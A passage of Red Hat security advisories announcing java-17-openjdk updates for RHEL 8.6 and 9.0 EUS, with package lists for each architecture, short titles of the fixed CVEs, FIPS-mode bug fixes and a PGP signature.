java-17-openjdk-debugsource-17.0.7.0.7-1.el8_6.aarch64.rpm  
java-17-openjdk-demo-17.0.7.0.7-1.el8_6.aarch64.rpm  
java-17-openjdk-devel-17.0.7.0.7-1.el8_6.aarch64.rpm  
java-17-openjdk-devel-debuginfo-17.0.7.0.7-1.el8_6.aarch64.rpm  
java-17-openjdk-headless-17.0.7.0.7-1.el8_6.aarch64.rpm  
java-17-openjdk-headless-debuginfo-17.0.7.0.7-1.el8_6.aarch64.rpm  
java-17-openjdk-javadoc-17.0.7.0.7-1.el8_6.aarch64.rpm  
java-17-openjdk-javadoc-zip-17.0.7.0.7-1.el8_6.aarch64.rpm  
java-17-openjdk-jmods-17.0.7.0.7-1.el8_6.aarch64.rpm  
java-17-openjdk-src-17.0.7.0.7-1.el8_6.aarch64.rpm  
java-17-openjdk-static-libs-17.0.7.0.7-1.el8_6.aarch64.rpm

ppc64le:  
java-17-openjdk-17.0.7.0.7-1.el8_6.ppc64le.rpm  
java-17-openjdk-debuginfo-17.0.7.0.7-1.el8_6.ppc64le.rpm  
java-17-openjdk-debugsource-17.0.7.0.7-1.el8_6.ppc64le.rpm  
java-17-openjdk-demo-17.0.7.0.7-1.el8_6.ppc64le.rpm  
java-17-openjdk-devel-17.0.7.0.7-1.el8_6.ppc64le.rpm  
java-17-openjdk-devel-debuginfo-17.0.7.0.7-1.el8_6.ppc64le.rpm  
java-17-openjdk-headless-17.0.7.0.7-1.el8_6.ppc64le.rpm  
java-17-openjdk-headless-debuginfo-17.0.7.0.7-1.el8_6.ppc64le.rpm  
java-17-openjdk-javadoc-17.0.7.0.7-1.el8_6.ppc64le.rpm  
java-17-openjdk-javadoc-zip-17.0.7.0.7-1.el8_6.ppc64le.rpm  
java-17-openjdk-jmods-17.0.7.0.7-1.el8_6.ppc64le.rpm  
java-17-openjdk-src-17.0.7.0.7-1.el8_6.ppc64le.rpm  
java-17-openjdk-static-libs-17.0.7.0.7-1.el8_6.ppc64le.rpm

s390x:  
java-17-openjdk-17.0.7.0.7-1.el8_6.s390x.rpm  
java-17-openjdk-debuginfo-17.0.7.0.7-1.el8_6.s390x.rpm  
java-17-openjdk-debugsource-17.0.7.0.7-1.el8_6.s390x.rpm  
java-17-openjdk-demo-17.0.7.0.7-1.el8_6.s390x.rpm  
java-17-openjdk-devel-17.0.7.0.7-1.el8_6.s390x.rpm  
java-17-openjdk-devel-debuginfo-17.0.7.0.7-1.el8_6.s390x.rpm  
java-17-openjdk-headless-17.0.7.0.7-1.el8_6.s390x.rpm  
java-17-openjdk-headless-debuginfo-17.0.7.0.7-1.el8_6.s390x.rpm  
java-17-openjdk-javadoc-17.0.7.0.7-1.el8_6.s390x.rpm  
java-17-openjdk-javadoc-zip-17.0.7.0.7-1.el8_6.s390x.rpm  
java-17-openjdk-jmods-17.0.7.0.7-1.el8_6.s390x.rpm  
java-17-openjdk-src-17.0.7.0.7-1.el8_6.s390x.rpm  
java-17-openjdk-static-libs-17.0.7.0.7-1.el8_6.s390x.rpm

x86_64:  
java-17-openjdk-17.0.7.0.7-1.el8_6.x86_64.rpm  
java-17-openjdk-debuginfo-17.0.7.0.7-1.el8_6.x86_64.rpm  
java-17-openjdk-debugsource-17.0.7.0.7-1.el8_6.x86_64.rpm  
java-17-openjdk-demo-17.0.7.0.7-1.el8_6.x86_64.rpm  
java-17-openjdk-devel-17.0.7.0.7-1.el8_6.x86_64.rpm  
java-17-openjdk-devel-debuginfo-17.0.7.0.7-1.el8_6.x86_64.rpm  
java-17-openjdk-headless-17.0.7.0.7-1.el8_6.x86_64.rpm  
java-17-openjdk-headless-debuginfo-17.0.7.0.7-1.el8_6.x86_64.rpm  
java-17-openjdk-javadoc-17.0.7.0.7-1.el8_6.x86_64.rpm  
java-17-openjdk-javadoc-zip-17.0.7.0.7-1.el8_6.x86_64.rpm  
java-17-openjdk-jmods-17.0.7.0.7-1.el8_6.x86_64.rpm  
java-17-openjdk-src-17.0.7.0.7-1.el8_6.x86_64.rpm  
java-17-openjdk-static-libs-17.0.7.0.7-1.el8_6.x86_64.rpm

Red Hat CodeReady Linux Builder EUS (v.8.6):

aarch64:  
java-17-openjdk-debuginfo-17.0.7.0.7-1.el8_6.aarch64.rpm  
java-17-openjdk-debugsource-17.0.7.0.7-1.el8_6.aarch64.rpm  
java-17-openjdk-demo-fastdebug-17.0.7.0.7-1.el8_6.aarch64.rpm  
java-17-openjdk-demo-slowdebug-17.0.7.0.7-1.el8_6.aarch64.rpm  
java-17-openjdk-devel-debuginfo-17.0.7.0.7-1.el8_6.aarch64.rpm  
java-17-openjdk-devel-fastdebug-17.0.7.0.7-1.el8_6.aarch64.rpm  
java-17-openjdk-devel-fastdebug-debuginfo-17.0.7.0.7-1.el8_6.aarch64.rpm  
java-17-openjdk-devel-slowdebug-17.0.7.0.7-1.el8_6.aarch64.rpm  
java-17-openjdk-devel-slowdebug-debuginfo-17.0.7.0.7-1.el8_6.aarch64.rpm  
java-17-openjdk-fastdebug-17.0.7.0.7-1.el8_6.aarch64.rpm  
java-17-openjdk-fastdebug-debuginfo-17.0.7.0.7-1.el8_6.aarch64.rpm  
java-17-openjdk-headless-debuginfo-17.0.7.0.7-1.el8_6.aarch64.rpm  
java-17-openjdk-headless-fastdebug-17.0.7.0.7-1.el8_6.aarch64.rpm  
java-17-openjdk-headless-fastdebug-debuginfo-17.0.7.0.7-1.el8_6.aarch64.rpm  
java-17-openjdk-headless-slowdebug-17.0.7.0.7-1.el8_6.aarch64.rpm  
java-17-openjdk-headless-slowdebug-debuginfo-17.0.7.0.7-1.el8_6.aarch64.rpm  
java-17-openjdk-jmods-fastdebug-17.0.7.0.7-1.el8_6.aarch64.rpm  
java-17-openjdk-jmods-slowdebug-17.0.7.0.7-1.el8_6.aarch64.rpm  
java-17-openjdk-slowdebug-17.0.7.0.7-1.el8_6.aarch64.rpm  
java-17-openjdk-slowdebug-debuginfo-17.0.7.0.7-1.el8_6.aarch64.rpm  
java-17-openjdk-src-fastdebug-17.0.7.0.7-1.el8_6.aarch64.rpm  
java-17-openjdk-src-slowdebug-17.0.7.0.7-1.el8_6.aarch64.rpm  
java-17-openjdk-static-libs-fastdebug-17.0.7.0.7-1.el8_6.aarch64.rpm  
java-17-openjdk-static-libs-slowdebug-17.0.7.0.7-1.el8_6.aarch64.rpm

ppc64le:  
java-17-openjdk-debuginfo-17.0.7.0.7-1.el8_6.ppc64le.rpm  
java-17-openjdk-debugsource-17.0.7.0.7-1.el8_6.ppc64le.rpm  
java-17-openjdk-demo-fastdebug-17.0.7.0.7-1.el8_6.ppc64le.rpm  
java-17-openjdk-demo-slowdebug-17.0.7.0.7-1.el8_6.ppc64le.rpm  
java-17-openjdk-devel-debuginfo-17.0.7.0.7-1.el8_6.ppc64le.rpm  
java-17-openjdk-devel-fastdebug-17.0.7.0.7-1.el8_6.ppc64le.rpm  
java-17-openjdk-devel-fastdebug-debuginfo-17.0.7.0.7-1.el8_6.ppc64le.rpm  
java-17-openjdk-devel-slowdebug-17.0.7.0.7-1.el8_6.ppc64le.rpm  
java-17-openjdk-devel-slowdebug-debuginfo-17.0.7.0.7-1.el8_6.ppc64le.rpm  
java-17-openjdk-fastdebug-17.0.7.0.7-1.el8_6.ppc64le.rpm  
java-17-openjdk-fastdebug-debuginfo-17.0.7.0.7-1.el8_6.ppc64le.rpm  
java-17-openjdk-headless-debuginfo-17.0.7.0.7-1.el8_6.ppc64le.rpm  
java-17-openjdk-headless-fastdebug-17.0.7.0.7-1.el8_6.ppc64le.rpm  
java-17-openjdk-headless-fastdebug-debuginfo-17.0.7.0.7-1.el8_6.ppc64le.rpm  
java-17-openjdk-headless-slowdebug-17.0.7.0.7-1.el8_6.ppc64le.rpm  
java-17-openjdk-headless-slowdebug-debuginfo-17.0.7.0.7-1.el8_6.ppc64le.rpm  
java-17-openjdk-jmods-fastdebug-17.0.7.0.7-1.el8_6.ppc64le.rpm  
java-17-openjdk-jmods-slowdebug-17.0.7.0.7-1.el8_6.ppc64le.rpm  
java-17-openjdk-slowdebug-17.0.7.0.7-1.el8_6.ppc64le.rpm  
java-17-openjdk-slowdebug-debuginfo-17.0.7.0.7-1.el8_6.ppc64le.rpm  
java-17-openjdk-src-fastdebug-17.0.7.0.7-1.el8_6.ppc64le.rpm  
java-17-openjdk-src-slowdebug-17.0.7.0.7-1.el8_6.ppc64le.rpm  
java-17-openjdk-static-libs-fastdebug-17.0.7.0.7-1.el8_6.ppc64le.rpm  
java-17-openjdk-static-libs-slowdebug-17.0.7.0.7-1.el8_6.ppc64le.rpm

s390x:  
java-17-openjdk-debuginfo-17.0.7.0.7-1.el8_6.s390x.rpm  
java-17-openjdk-debugsource-17.0.7.0.7-1.el8_6.s390x.rpm  
java-17-openjdk-demo-slowdebug-17.0.7.0.7-1.el8_6.s390x.rpm  
java-17-openjdk-devel-debuginfo-17.0.7.0.7-1.el8_6.s390x.rpm  
java-17-openjdk-devel-slowdebug-17.0.7.0.7-1.el8_6.s390x.rpm  
java-17-openjdk-devel-slowdebug-debuginfo-17.0.7.0.7-1.el8_6.s390x.rpm  
java-17-openjdk-headless-debuginfo-17.0.7.0.7-1.el8_6.s390x.rpm  
java-17-openjdk-headless-slowdebug-17.0.7.0.7-1.el8_6.s390x.rpm  
java-17-openjdk-headless-slowdebug-debuginfo-17.0.7.0.7-1.el8_6.s390x.rpm  
java-17-openjdk-jmods-slowdebug-17.0.7.0.7-1.el8_6.s390x.rpm  
java-17-openjdk-slowdebug-17.0.7.0.7-1.el8_6.s390x.rpm  
java-17-openjdk-slowdebug-debuginfo-17.0.7.0.7-1.el8_6.s390x.rpm  
java-17-openjdk-src-slowdebug-17.0.7.0.7-1.el8_6.s390x.rpm  
java-17-openjdk-static-libs-slowdebug-17.0.7.0.7-1.el8_6.s390x.rpm

x86_64:  
java-17-openjdk-debuginfo-17.0.7.0.7-1.el8_6.x86_64.rpm  
java-17-openjdk-debugsource-17.0.7.0.7-1.el8_6.x86_64.rpm  
java-17-openjdk-demo-fastdebug-17.0.7.0.7-1.el8_6.x86_64.rpm  
java-17-openjdk-demo-slowdebug-17.0.7.0.7-1.el8_6.x86_64.rpm  
java-17-openjdk-devel-debuginfo-17.0.7.0.7-1.el8_6.x86_64.rpm  
java-17-openjdk-devel-fastdebug-17.0.7.0.7-1.el8_6.x86_64.rpm  
java-17-openjdk-devel-fastdebug-debuginfo-17.0.7.0.7-1.el8_6.x86_64.rpm  
java-17-openjdk-devel-slowdebug-17.0.7.0.7-1.el8_6.x86_64.rpm  
java-17-openjdk-devel-slowdebug-debuginfo-17.0.7.0.7-1.el8_6.x86_64.rpm  
java-17-openjdk-fastdebug-17.0.7.0.7-1.el8_6.x86_64.rpm  
java-17-openjdk-fastdebug-debuginfo-17.0.7.0.7-1.el8_6.x86_64.rpm  
java-17-openjdk-headless-debuginfo-17.0.7.0.7-1.el8_6.x86_64.rpm  
java-17-openjdk-headless-fastdebug-17.0.7.0.7-1.el8_6.x86_64.rpm  
java-17-openjdk-headless-fastdebug-debuginfo-17.0.7.0.7-1.el8_6.x86_64.rpm  
java-17-openjdk-headless-slowdebug-17.0.7.0.7-1.el8_6.x86_64.rpm  
java-17-openjdk-headless-slowdebug-debuginfo-17.0.7.0.7-1.el8_6.x86_64.rpm  
java-17-openjdk-jmods-fastdebug-17.0.7.0.7-1.el8_6.x86_64.rpm  
java-17-openjdk-jmods-slowdebug-17.0.7.0.7-1.el8_6.x86_64.rpm  
java-17-openjdk-slowdebug-17.0.7.0.7-1.el8_6.x86_64.rpm  
java-17-openjdk-slowdebug-debuginfo-17.0.7.0.7-1.el8_6.x86_64.rpm  
java-17-openjdk-src-fastdebug-17.0.7.0.7-1.el8_6.x86_64.rpm  
java-17-openjdk-src-slowdebug-17.0.7.0.7-1.el8_6.x86_64.rpm  
java-17-openjdk-static-libs-fastdebug-17.0.7.0.7-1.el8_6.x86_64.rpm  
java-17-openjdk-static-libs-slowdebug-17.0.7.0.7-1.el8_6.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-21930  
https://access.redhat.com/security/cve/CVE-2023-21937  
https://access.redhat.com/security/cve/CVE-2023-21938  
https://access.redhat.com/security/cve/CVE-2023-21939  
https://access.redhat.com/security/cve/CVE-2023-21954  
https://access.redhat.com/security/cve/CVE-2023-21967  
https://access.redhat.com/security/cve/CVE-2023-21968  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZEgsfdzjgjWX9erEAQgq0Q//QX+4dXnHCWmG39cdVLR4dUj1TQcuGybm  
RXUuVFu/hqIQpE1jNPArLCeS19RWywZ8KI45rYLaGmhyR/mA6AJKMaJA3xCLtY+e  
aZXWmkcpmadVsLECb87sT5wNTEmWRnSPXoDWqv9zhDSTVOjr1Weg3wEPOBLnxEXu  
uTXm+ajW4zKeQC8vVKPkJV79vgb+0ltPRVASHgfjKTTkW7aDCN/u1+vkDhhnwI9s  
SklpX3Z3UDhjxu0VjHdhHBul/G5RnrHc0UVCjtuaKwPgQdgi9ueEgE5YDO+A+OWO  
xyVQlKtx+IHLt1rNy+kt4JVfbH3mR49VlPLdprF1jXtujWrx4X8O6G43zyKeerPt  
CaCiBHRzFPyuJJFRUfpZOWbEjY3jz93SekuWlwytPL2zn7GguEbtDtpW37KPyTO/  
GEhg6OXV9CkG+hYcN4vIbu4aOUNPKIz5EnTHKMj8KIGSq0rwvYrRo27ftFPkFC+D  
i7R3eBZjW1Av1c/7wFddWS+/+Oz17o47JBVCnOShINpUZB+kTPRvWLCyxkMzKghG  
a+T56VjqHYDc9JMSNyjqdV5CIWJQWxlkFkOo2xFlYL+k4p5bU3thYgrM9QYuCcCa  
A9s+FRyoRkR7WPBKmoY/AXTJHcSKmfE0EG63cusRdh4l1i7URfMNRtb4OgdpQLRa  
ucOmMTybnpk=  
=pXrM  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-1891-01

Red Hat Security Advisory 2023-1900-01 - The java-17-openjdk packages provide the OpenJDK 17 Java Runtime Environment and the OpenJDK 17 Java Software Development Kit.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: java-17-openjdk security and bug fix update  
Advisory ID:       RHSA-2023:1900-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1900  
Issue date:        2023-04-20  
CVE Names:         CVE-2023-21930 CVE-2023-21937 CVE-2023-21938   
                   CVE-2023-21939 CVE-2023-21954 CVE-2023-21967   
                   CVE-2023-21968   
=====================================================================

1. Summary:

An update for java-17-openjdk is now available for Red Hat Enterprise Linux  
9.0 Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat CodeReady Linux Builder EUS (v.9.0) - aarch64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux AppStream EUS (v.9.0) - aarch64, ppc64le, s390x, x86_64

3. Description:

The java-17-openjdk packages provide the OpenJDK 17 Java Runtime  
Environment and the OpenJDK 17 Java Software Development Kit.

Security Fix(es):

* OpenJDK: improper connection handling during TLS handshake (8294474)  
(CVE-2023-21930)

* OpenJDK: Swing HTML parsing issue (8296832) (CVE-2023-21939)

* OpenJDK: incorrect enqueue of references in garbage collector (8298191)  
(CVE-2023-21954)

* OpenJDK: certificate validation issue in TLS session negotiation  
(8298310) (CVE-2023-21967)

* OpenJDK: missing string checks for NULL characters (8296622)  
(CVE-2023-21937)

* OpenJDK: incorrect handling of NULL characters in ProcessBuilder  
(8295304) (CVE-2023-21938)

* OpenJDK: missing check for slash characters in URI-to-path conversion  
(8298667) (CVE-2023-21968)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

Bug Fix(es):

* In FIPS mode, the list of cryptographic services and algorithms available  
is limited to those that are FIPS compliant. It was found that this  
filtering was too strict and was also excluding service attributes. These  
attributes are now made available in FIPS mode, as they are in non-FIPS  
mode. (RHBZ#2186805)

* Previously, the XML signature provider was unable to operate in FIPS  
mode. Following recent enhancements to FIPS mode support, the XML signature  
provider can now be supported. It is now enabled in FIPS mode.  
(RHBZ#2186812)

* The PKCS#11 provider used by FIPS mode can be supported by different  
PKCS#11 tokens. It was found that some PKCS#11 tokens may not be  
initialised fully before use, leading to an exception being thrown by the  
provider. With this release, this exception is now expected and handled by  
the FIPS support code. (RHBZ#2186808)

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

All running instances of OpenJDK Java must be restarted for this update to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2186805 - Add missing attributes when registering services in FIPS mode [rhel-9, openjdk-17] [rhel-9.0.0.z]  
2186808 - C_GetInfo can throw an exception if called before initialization in some PKCS #11 tokens [rhel-9, openjdk-17] [rhel-9.0.0.z]  
2186812 - Enable XML Signature provider in FIPS mode [rhel-9, openjdk-17] [rhel-9.0.0.z]  
2187435 - CVE-2023-21930 OpenJDK: improper connection handling during TLS handshake (8294474)  
2187441 - CVE-2023-21954 OpenJDK: incorrect enqueue of references in garbage collector (8298191)  
2187704 - CVE-2023-21967 OpenJDK: certificate validation issue in TLS session negotiation (8298310)  
2187724 - CVE-2023-21939 OpenJDK: Swing HTML parsing issue (8296832)  
2187758 - CVE-2023-21938 OpenJDK: incorrect handling of NULL characters in ProcessBuilder (8295304)  
2187790 - CVE-2023-21937 OpenJDK: missing string checks for NULL characters (8296622)  
2187802 - CVE-2023-21968 OpenJDK: missing check for slash characters in URI-to-path conversion (8298667)

6. Package List:

Red Hat Enterprise Linux AppStream EUS (v.9.0):

Source:  
java-17-openjdk-17.0.7.0.7-1.el9_0.src.rpm

aarch64:  
java-17-openjdk-17.0.7.0.7-1.el9_0.aarch64.rpm  
java-17-openjdk-debuginfo-17.0.7.0.7-1.el9_0.aarch64.rpm  
java-17-openjdk-debugsource-17.0.7.0.7-1.el9_0.aarch64.rpm  
java-17-openjdk-demo-17.0.7.0.7-1.el9_0.aarch64.rpm  
java-17-openjdk-devel-17.0.7.0.7-1.el9_0.aarch64.rpm  
java-17-openjdk-devel-debuginfo-17.0.7.0.7-1.el9_0.aarch64.rpm  
java-17-openjdk-headless-17.0.7.0.7-1.el9_0.aarch64.rpm  
java-17-openjdk-headless-debuginfo-17.0.7.0.7-1.el9_0.aarch64.rpm  
java-17-openjdk-javadoc-17.0.7.0.7-1.el9_0.aarch64.rpm  
java-17-openjdk-javadoc-zip-17.0.7.0.7-1.el9_0.aarch64.rpm  
java-17-openjdk-jmods-17.0.7.0.7-1.el9_0.aarch64.rpm  
java-17-openjdk-src-17.0.7.0.7-1.el9_0.aarch64.rpm  
java-17-openjdk-static-libs-17.0.7.0.7-1.el9_0.aarch64.rpm

ppc64le:  
java-17-openjdk-17.0.7.0.7-1.el9_0.ppc64le.rpm  
java-17-openjdk-debuginfo-17.0.7.0.7-1.el9_0.ppc64le.rpm  
java-17-openjdk-debugsource-17.0.7.0.7-1.el9_0.ppc64le.rpm  
java-17-openjdk-demo-17.0.7.0.7-1.el9_0.ppc64le.rpm  
java-17-openjdk-devel-17.0.7.0.7-1.el9_0.ppc64le.rpm  
java-17-openjdk-devel-debuginfo-17.0.7.0.7-1.el9_0.ppc64le.rpm  
java-17-openjdk-headless-17.0.7.0.7-1.el9_0.ppc64le.rpm  
java-17-openjdk-headless-debuginfo-17.0.7.0.7-1.el9_0.ppc64le.rpm  
java-17-openjdk-javadoc-17.0.7.0.7-1.el9_0.ppc64le.rpm  
java-17-openjdk-javadoc-zip-17.0.7.0.7-1.el9_0.ppc64le.rpm  
java-17-openjdk-jmods-17.0.7.0.7-1.el9_0.ppc64le.rpm  
java-17-openjdk-src-17.0.7.0.7-1.el9_0.ppc64le.rpm  
java-17-openjdk-static-libs-17.0.7.0.7-1.el9_0.ppc64le.rpm

s390x:  
java-17-openjdk-17.0.7.0.7-1.el9_0.s390x.rpm  
java-17-openjdk-debuginfo-17.0.7.0.7-1.el9_0.s390x.rpm  
java-17-openjdk-debugsource-17.0.7.0.7-1.el9_0.s390x.rpm  
java-17-openjdk-demo-17.0.7.0.7-1.el9_0.s390x.rpm  
java-17-openjdk-devel-17.0.7.0.7-1.el9_0.s390x.rpm  
java-17-openjdk-devel-debuginfo-17.0.7.0.7-1.el9_0.s390x.rpm  
java-17-openjdk-headless-17.0.7.0.7-1.el9_0.s390x.rpm  
java-17-openjdk-headless-debuginfo-17.0.7.0.7-1.el9_0.s390x.rpm  
java-17-openjdk-javadoc-17.0.7.0.7-1.el9_0.s390x.rpm  
java-17-openjdk-javadoc-zip-17.0.7.0.7-1.el9_0.s390x.rpm  
java-17-openjdk-jmods-17.0.7.0.7-1.el9_0.s390x.rpm  
java-17-openjdk-src-17.0.7.0.7-1.el9_0.s390x.rpm  
java-17-openjdk-static-libs-17.0.7.0.7-1.el9_0.s390x.rpm

x86_64:  
java-17-openjdk-17.0.7.0.7-1.el9_0.x86_64.rpm  
java-17-openjdk-debuginfo-17.0.7.0.7-1.el9_0.x86_64.rpm  
java-17-openjdk-debugsource-17.0.7.0.7-1.el9_0.x86_64.rpm  
java-17-openjdk-demo-17.0.7.0.7-1.el9_0.x86_64.rpm  
java-17-openjdk-devel-17.0.7.0.7-1.el9_0.x86_64.rpm  
java-17-openjdk-devel-debuginfo-17.0.7.0.7-1.el9_0.x86_64.rpm  
java-17-openjdk-headless-17.0.7.0.7-1.el9_0.x86_64.rpm  
java-17-openjdk-headless-debuginfo-17.0.7.0.7-1.el9_0.x86_64.rpm  
java-17-openjdk-javadoc-17.0.7.0.7-1.el9_0.x86_64.rpm  
java-17-openjdk-javadoc-zip-17.0.7.0.7-1.el9_0.x86_64.rpm  
java-17-openjdk-jmods-17.0.7.0.7-1.el9_0.x86_64.rpm  
java-17-openjdk-src-17.0.7.0.7-1.el9_0.x86_64.rpm  
java-17-openjdk-static-libs-17.0.7.0.7-1.el9_0.x86_64.rpm

Red Hat CodeReady Linux Builder EUS (v.9.0):

aarch64:  
java-17-openjdk-debuginfo-17.0.7.0.7-1.el9_0.aarch64.rpm  
java-17-openjdk-debugsource-17.0.7.0.7-1.el9_0.aarch64.rpm  
java-17-openjdk-demo-fastdebug-17.0.7.0.7-1.el9_0.aarch64.rpm  
java-17-openjdk-demo-slowdebug-17.0.7.0.7-1.el9_0.aarch64.rpm  
java-17-openjdk-devel-debuginfo-17.0.7.0.7-1.el9_0.aarch64.rpm  
java-17-openjdk-devel-fastdebug-17.0.7.0.7-1.el9_0.aarch64.rpm  
java-17-openjdk-devel-fastdebug-debuginfo-17.0.7.0.7-1.el9_0.aarch64.rpm  
java-17-openjdk-devel-slowdebug-17.0.7.0.7-1.el9_0.aarch64.rpm  
java-17-openjdk-devel-slowdebug-debuginfo-17.0.7.0.7-1.el9_0.aarch64.rpm  
java-17-openjdk-fastdebug-17.0.7.0.7-1.el9_0.aarch64.rpm  
java-17-openjdk-fastdebug-debuginfo-17.0.7.0.7-1.el9_0.aarch64.rpm  
java-17-openjdk-headless-debuginfo-17.0.7.0.7-1.el9_0.aarch64.rpm  
java-17-openjdk-headless-fastdebug-17.0.7.0.7-1.el9_0.aarch64.rpm  
java-17-openjdk-headless-fastdebug-debuginfo-17.0.7.0.7-1.el9_0.aarch64.rpm  
java-17-openjdk-headless-slowdebug-17.0.7.0.7-1.el9_0.aarch64.rpm  
java-17-openjdk-headless-slowdebug-debuginfo-17.0.7.0.7-1.el9_0.aarch64.rpm  
java-17-openjdk-jmods-fastdebug-17.0.7.0.7-1.el9_0.aarch64.rpm  
java-17-openjdk-jmods-slowdebug-17.0.7.0.7-1.el9_0.aarch64.rpm  
java-17-openjdk-slowdebug-17.0.7.0.7-1.el9_0.aarch64.rpm  
java-17-openjdk-slowdebug-debuginfo-17.0.7.0.7-1.el9_0.aarch64.rpm  
java-17-openjdk-src-fastdebug-17.0.7.0.7-1.el9_0.aarch64.rpm  
java-17-openjdk-src-slowdebug-17.0.7.0.7-1.el9_0.aarch64.rpm  
java-17-openjdk-static-libs-fastdebug-17.0.7.0.7-1.el9_0.aarch64.rpm  
java-17-openjdk-static-libs-slowdebug-17.0.7.0.7-1.el9_0.aarch64.rpm

ppc64le:  
java-17-openjdk-debuginfo-17.0.7.0.7-1.el9_0.ppc64le.rpm  
java-17-openjdk-debugsource-17.0.7.0.7-1.el9_0.ppc64le.rpm  
java-17-openjdk-demo-fastdebug-17.0.7.0.7-1.el9_0.ppc64le.rpm  
java-17-openjdk-demo-slowdebug-17.0.7.0.7-1.el9_0.ppc64le.rpm  
java-17-openjdk-devel-debuginfo-17.0.7.0.7-1.el9_0.ppc64le.rpm  
java-17-openjdk-devel-fastdebug-17.0.7.0.7-1.el9_0.ppc64le.rpm  
java-17-openjdk-devel-fastdebug-debuginfo-17.0.7.0.7-1.el9_0.ppc64le.rpm  
java-17-openjdk-devel-slowdebug-17.0.7.0.7-1.el9_0.ppc64le.rpm  
java-17-openjdk-devel-slowdebug-debuginfo-17.0.7.0.7-1.el9_0.ppc64le.rpm  
java-17-openjdk-fastdebug-17.0.7.0.7-1.el9_0.ppc64le.rpm  
java-17-openjdk-fastdebug-debuginfo-17.0.7.0.7-1.el9_0.ppc64le.rpm  
java-17-openjdk-headless-debuginfo-17.0.7.0.7-1.el9_0.ppc64le.rpm  
java-17-openjdk-headless-fastdebug-17.0.7.0.7-1.el9_0.ppc64le.rpm  
java-17-openjdk-headless-fastdebug-debuginfo-17.0.7.0.7-1.el9_0.ppc64le.rpm  
java-17-openjdk-headless-slowdebug-17.0.7.0.7-1.el9_0.ppc64le.rpm  
java-17-openjdk-headless-slowdebug-debuginfo-17.0.7.0.7-1.el9_0.ppc64le.rpm  
java-17-openjdk-jmods-fastdebug-17.0.7.0.7-1.el9_0.ppc64le.rpm  
java-17-openjdk-jmods-slowdebug-17.0.7.0.7-1.el9_0.ppc64le.rpm  
java-17-openjdk-slowdebug-17.0.7.0.7-1.el9_0.ppc64le.rpm  
java-17-openjdk-slowdebug-debuginfo-17.0.7.0.7-1.el9_0.ppc64le.rpm  
java-17-openjdk-src-fastdebug-17.0.7.0.7-1.el9_0.ppc64le.rpm  
java-17-openjdk-src-slowdebug-17.0.7.0.7-1.el9_0.ppc64le.rpm  
java-17-openjdk-static-libs-fastdebug-17.0.7.0.7-1.el9_0.ppc64le.rpm  
java-17-openjdk-static-libs-slowdebug-17.0.7.0.7-1.el9_0.ppc64le.rpm

s390x:  
java-17-openjdk-debuginfo-17.0.7.0.7-1.el9_0.s390x.rpm  
java-17-openjdk-debugsource-17.0.7.0.7-1.el9_0.s390x.rpm  
java-17-openjdk-demo-slowdebug-17.0.7.0.7-1.el9_0.s390x.rpm  
java-17-openjdk-devel-debuginfo-17.0.7.0.7-1.el9_0.s390x.rpm  
java-17-openjdk-devel-slowdebug-17.0.7.0.7-1.el9_0.s390x.rpm  
java-17-openjdk-devel-slowdebug-debuginfo-17.0.7.0.7-1.el9_0.s390x.rpm  
java-17-openjdk-headless-debuginfo-17.0.7.0.7-1.el9_0.s390x.rpm  
java-17-openjdk-headless-slowdebug-17.0.7.0.7-1.el9_0.s390x.rpm  
java-17-openjdk-headless-slowdebug-debuginfo-17.0.7.0.7-1.el9_0.s390x.rpm  
java-17-openjdk-jmods-slowdebug-17.0.7.0.7-1.el9_0.s390x.rpm  
java-17-openjdk-slowdebug-17.0.7.0.7-1.el9_0.s390x.rpm  
java-17-openjdk-slowdebug-debuginfo-17.0.7.0.7-1.el9_0.s390x.rpm  
java-17-openjdk-src-slowdebug-17.0.7.0.7-1.el9_0.s390x.rpm  
java-17-openjdk-static-libs-slowdebug-17.0.7.0.7-1.el9_0.s390x.rpm

x86_64:  
java-17-openjdk-debuginfo-17.0.7.0.7-1.el9_0.x86_64.rpm  
java-17-openjdk-debugsource-17.0.7.0.7-1.el9_0.x86_64.rpm  
java-17-openjdk-demo-fastdebug-17.0.7.0.7-1.el9_0.x86_64.rpm  
java-17-openjdk-demo-slowdebug-17.0.7.0.7-1.el9_0.x86_64.rpm  
java-17-openjdk-devel-debuginfo-17.0.7.0.7-1.el9_0.x86_64.rpm  
java-17-openjdk-devel-fastdebug-17.0.7.0.7-1.el9_0.x86_64.rpm  
java-17-openjdk-devel-fastdebug-debuginfo-17.0.7.0.7-1.el9_0.x86_64.rpm  
java-17-openjdk-devel-slowdebug-17.0.7.0.7-1.el9_0.x86_64.rpm  
java-17-openjdk-devel-slowdebug-debuginfo-17.0.7.0.7-1.el9_0.x86_64.rpm  
java-17-openjdk-fastdebug-17.0.7.0.7-1.el9_0.x86_64.rpm  
java-17-openjdk-fastdebug-debuginfo-17.0.7.0.7-1.el9_0.x86_64.rpm  
java-17-openjdk-headless-debuginfo-17.0.7.0.7-1.el9_0.x86_64.rpm  
java-17-openjdk-headless-fastdebug-17.0.7.0.7-1.el9_0.x86_64.rpm  
java-17-openjdk-headless-fastdebug-debuginfo-17.0.7.0.7-1.el9_0.x86_64.rpm  
java-17-openjdk-headless-slowdebug-17.0.7.0.7-1.el9_0.x86_64.rpm  
